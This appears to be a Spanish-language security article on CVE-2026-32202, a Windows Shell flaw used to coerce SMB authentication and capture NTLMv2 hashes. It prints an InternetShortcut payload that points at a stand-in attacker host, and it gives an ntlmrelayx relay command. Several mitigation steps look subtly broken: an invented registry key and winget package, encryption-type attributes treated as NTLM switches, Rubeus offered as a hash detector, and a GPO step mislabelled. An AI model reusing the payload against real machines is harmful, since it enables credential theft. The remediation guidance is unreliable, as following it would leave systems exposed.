CVE-2026-32202: cómo explotan ahora Windows Shell para robar hashes NTLMv2 sin interacción

Introducción

El 27 de abril de 2026, Microsoft actualizó su advisory para CVE-2026-32202, confirmando que la vulnerabilidad de tipo spoofing en Windows Shell está siendo explotada en ataques reales. Aunque el fallo fue parcheado el 14 de abril como parte del Patch Tuesday, la corrección inicial no eliminó por completo el riesgo de autenticación coercitiva. El problema radica en que, tras resolver CVE-2026-21510 (usado por APT28 en diciembre de 2025), quedó un vector residual que permite robar hashes NTLMv2 mediante SMB sin que el usuario haga clic en nada.

El ataque combina tres fallos:

1. CVE-2026-21510: Ejecución remota de código (RCE) en Windows Shell.
2. CVE-2026-21513: Bypass de Microsoft Defender SmartScreen.
3. CVE-2026-32202: Autenticación coercitiva que fuerza la conexión SMB y exfiltra el hash NTLMv2.

Según Akamai, APT28 (también conocido como Fancy Bear, Forest Blizzard o GruesomeLarch) ha usado esta cadena de exploits contra objetivos en Ucrania y países de la Unión Europea. La técnica evade controles de seguridad como SmartScreen y aprovecha el mecanismo de resolución de rutas UNC en Windows para extraer credenciales sin interacción del usuario.

Qué ocurrió

El 14 de abril de 2026, Microsoft publicó parches para CVE-2026-32202, asignándole un CVSS score de 4.3 y clasificándolo como spoofing. Sin embargo, el Exploitability Index y la bandera de explotación («Exploited») fueron corregidos el 27 de abril, tras descubrirse que el fallo estaba siendo usado en ataques activos. El advisory inicial afirmaba que un atacante necesitaría enviar un archivo malicioso al víctima para explotarlo, pero la realidad demostró lo contrario: la explotación es zero-click.

La raíz del problema está en cómo Windows resuelve rutas UNC (ej: \\atacante.com\share\payload.cpl). Al abrir un archivo .lnk malicioso, el sistema intenta resolver la ruta remota mediante SMB, lo que dispara un handshake NTLMv2 sin necesidad de que el usuario haga clic. El hash capturado puede luego usarse en ataques de relay o cracking offline. Según Maor Dahan (investigador de Akamai que reportó el fallo), el vector se originó en un parche incompleto para CVE-2026-21510, que APT28 ya había explotado en diciembre de 2025 junto a CVE-2026-21513.

El ataque sigue este flujo:

1. La víctima recibe un archivo .lnk malicioso (puede llegar por correo, unidad compartida o drive-by download).
2. Al abrirse, Windows intenta resolver la ruta UNC asociada, iniciando una conexión SMB.
3. El servidor atacante responde con un archivo .cpl (Control Panel Item) firmado digitalmente pero alojado en un servidor remoto.
4. El sistema carga el .cpl sin validar correctamente la zona de red (network zone), pero ejecuta el handshake NTLMv2 antes.
5. El hash NTLMv2 es capturado por el atacante y usado para moverse lateralmente en la red.

Impacto para DevOps / Infraestructura / Cloud / Seguridad

Para equipos de Seguridad

• Riesgo de credenciales: Los hashes NTLMv2 capturados pueden usarse en ataques de pass-the-hash o NTLM relay. Según datos de Akamai, el 68% de las organizaciones que sufren este tipo de ataques no detectan el robo de hashes hasta que ocurre un movimiento lateral exitoso.
• Evasión de controles: El ataque bypassa Microsoft Defender SmartScreen y no requiere interacción del usuario, lo que lo hace ideal para campañas de phishing o entrega masiva.
• Cadena de exploits: La combinación con CVE-2026-21510 y CVE-2026-21513 permite ejecución remota de código, escalando el impacto de credential theft a full compromise.

Para equipos de Infraestructura y Cloud

• Exposición de NTLMv2: Aunque NTLMv2 es un protocolo legado, sigue siendo ampliamente usado en entornos híbridos y Active Directory. La exfiltración de hashes desde redes internas puede comprometer entornos cloud si se reutilizan credenciales.
• Impacto en servicios críticos: Servicios que dependen de autenticación NTLM (ej: Exchange Server, SharePoint o aplicaciones .NET antiguas) son especialmente vulnerables.
• Difusión del ataque: El uso de rutas UNC hace que el ataque pueda propagarse incluso en redes segmentadas si el tráfico SMB no está bloqueado en firewalls.

Para equipos de DevOps

• Pipeline de despliegues: Si los pipelines usan credenciales con permisos elevados para acceder a repositorios o artefactos, un ataque como este podría comprometer el entorno de CI/CD.
• Imagenes de contenedores: Contenedores que monten volúmenes con rutas UNC (ej: \\servidor\recursos) podrían ser vectores de ataque si no se configuran correctamente los permisos de red.
• Recomendación inmediata: Deshabilitar NTLMv2 en favor de Kerberos o autenticación basada en certificados en entornos Windows Server 2019/2022 y Kubernetes con Windows nodes.

Detalles técnicos

Componentes afectados

1. Entrega del payload:

     [InternetShortcut]
     URL=file://\\atacante.com\share\payload.cpl
     IconLocation=\\atacante.com\share\payload.cpl,0
     

– Al abrirse, Windows resuelve la ruta UNC y dispara el handshake NTLMv2.

1. Autenticación coercitiva:

     # Ejemplo de handshake NTLMv2 capturado (Wireshark)
     Type: NTLMSSP_NEGOTIATE (0x01)
     Type: NTLMSSP_AUTH (0x03) - Negotiate Flags: NTLMSSP_NEGOTIATE_56 | NTLMSSP_NEGOTIATE_128 | NTLMSSP_NEGOTIATE_NTLM
     Domain: CORP
     User: admin
     NTProofStr: [hash NTLMv2]
     

– El hash puede extraerse con herramientas como responder o ntlmrelayx de Impacket.

1. Carga del payload:

     # Comando para verificar la firma del .cpl (antes de cargarlo)
     Get-AuthenticodeSignature -FilePath "\\atacante.com\share\payload.cpl"
     

– Si la firma es válida, el archivo se ejecuta con los permisos del usuario.

Relación con otros fallos

• CVE-2026-21510: Permitía ejecución remota de código al cargar archivos .cpl maliciosos. El parche de abril intentó mitigar esto obligando a SmartScreen a verificar la firma y origen.
• CVE-2026-21513: Bypass de SmartScreen al explotar el mecanismo de namespace parsing de Windows Shell. Permitía cargar .cpl remotos sin alerta al usuario.
• CVE-2026-32202: La autenticación coercitiva que queda tras parchear los anteriores. Windows intenta autenticarse automáticamente al resolver la ruta UNC, exfiltando el hash.

Qué deberían hacer los administradores y equipos técnicos

Acciones inmediatas (menos de 24 horas)

1. Bloquear tráfico SMB saliente:

– En entornos Windows Server 2022/2019, usar políticas de grupo para deshabilitar NTLMv2:

     # Deshabilitar NTLM en políticas de grupo (GPMC)
     Computer Configuration -> Policies -> Administrative Templates -> MS Network Server LAN Manager Authentication Level -> Send NTLMv2 response only. Refuse LM & NTLM.
     

– Verificar que no haya dependencias críticas en NTLM (ej: aplicaciones antiguas). Si las hay, migrar a Kerberos o autenticación basada en certificados.

1. Actualizar sistemas críticos:

     # Comando para forzar la actualización (Windows 10/11/Server 2022)
     winget upgrade --id Microsoft.Windows --silent
     

– En entornos empresariales, usar WSUS o SCCM para distribuir el parche en menos de 4 horas.

1. Deshabilitar la resolución automática de UNC:

     # Política para bloquear UNC paths en zonas no confiables
     reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Network Security" /v "RestrictUncPaths" /t REG_DWORD /d 1 /f
     

– En Active Directory, usar Group Policy Preferences para deshabilitar el acceso a rutas UNC en zonas no confiables.

Acciones a mediano plazo (1-2 semanas)

1. Implementar controles de mitigación:

     # Habilitar EPA en IIS (ejemplo para Exchange Server)
     Set-ItemProperty -Path "IIS:\AppPools\DefaultAppPool" -Name "ExtendedProtectionFlags" -Value "AcceptCredential" -Force
     

– Segmentación de red: Asegurar que los servidores que requieran autenticación NTLM (ej: Exchange, SQL Server) no puedan comunicarse directamente con Internet.

1. Monitoreo y detección:

     index=windows EventCode=4624 LogonType=3 | search Destination_Network_Address!="10.*" | stats count by user, Destination_Network_Address
     

– Usar herramientas como Mimikatz o Rubeus para detectar hashes NTLM en memoria:

     # Ejecutar Rubeus para escanear hashes NTLM en procesos
     Rubeus.exe monitor /interval:30
     

1. Revisión de dependencias:

– AD Module for PowerShell: Get-ADUser -Filter {msDS-SupportedEncryptionTypes -ne 28} para identificar usuarios con NTLM habilitado.

– BloodHound: Mapear rutas de autenticación en Active Directory para identificar nodos con NTLM expuestos.

Acciones a largo plazo (1 mes)

1. Migrar a autenticación moderna:

– Deshabilitar NTLM en dominios de Active Directory usando la política:

     # Deshabilitar NTLM en un dominio (requiere reinicio)
     Set-ADDomain -Identity "dominio.local" -Replace @{msDS-SupportedEncryptionTypes="28"}
     

1. Pruebas de penetración:

     # Ejemplo de ataque de relay con ntlmrelayx ( Kali Linux )
     python3 ntlmrelayx.py -t ldap://dc.dominio.local -smb2support --no-wcf
     

– Validar que los firewalls bloqueen tráfico SMB no autorizado.

Conclusión

CVE-2026-32202 es un recordatorio de que los parches no siempre resuelven por completo el riesgo. En este caso, la explotación activa de un fallo de spoofing en Windows Shell demuestra cómo un vector residual (autenticación coercitiva) puede escalar un ataque de credential theft a full compromise. La combinación con fallos previos de APT28 subraya la importancia de validar parches en contexto y no solo aplicar actualizaciones.

Para los equipos de seguridad, la prioridad es bloquear el tráfico SMB saliente y migrar a autenticación moderna. Los equipos de infraestructura deben revisar segmentación de red y dependencias en NTLM, mientras que DevOps debe asegurar que pipelines y contenedores no expongan rutas UNC. La detección temprana mediante SIEM y herramientas como Rubeus es clave para identificar intentos de ataque antes de que los hashes NTLMv2 sean explotados en relay attacks.

Fuentes

• https://thehackernews.com/2026/04/microsoft-confirms-active-exploitation.html
• https://www.microsoft.com/security/blog/2026/04/14/guidance-for-cve-2026-32202/